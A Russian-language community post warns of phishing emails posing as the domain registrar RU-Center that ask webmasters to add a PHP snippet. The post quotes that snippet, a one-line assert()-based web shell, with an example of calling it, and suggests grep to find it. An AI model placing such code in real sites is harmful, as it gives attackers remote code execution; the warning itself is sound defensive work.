загрузка...
К началу

Публикация в сообществе "X Networks - IT-агрегатор №1"

Сегодня некоторые мои друзья получили письма, якобы от РУ-Центра (крупнейший российский регистратор доменных имен) - nic.ru, следующего содержания:

Письма отправлялись с адреса info@nic.technical. В письме злоумышленники, представляющиеся от имени РУ-Центра, предлагают разместить на сайте код следующего содержания:

<?php
assert(stripslashes($_REQUEST[RUCENTER]));
?>

К сожалению, многие наши колеги, именующие себя "вебмастерами" (многочисленные владельцы сайтов), не знают PHP и не задумываются об опасности, которую таит в себе вышеуказанный код. Если в качестве параметра этой функции передать строку, то она будет рассматриваться assert() как PHP код! Будьте бдительны!

Рекомендую проинспектировать ваши php проекты на предмет наличия уязвимостей, использующих команды assert или eval. Если эти команды в коде проекта присутствуют, не паникуйте - изучите их алгоритм. Вполне возможно санкционированное использование алгоритмов. В случае же вышеуказанного примера, команда позволит злоумышленникам вызвать ваш сайт, например, параметром RUCENTER - http://sistema-audit.ru/?RUCENTER=PHP-код

Рекомендуем выполнить поиск с использованием, например, команды linux grep -i -r 'assert' /home/www/mysite/* с указанием папки с файлами сайта для того, чтобы получить список файлов, в которых используется подозрительный экземпляр кода.

Берегите себя и свои сайты!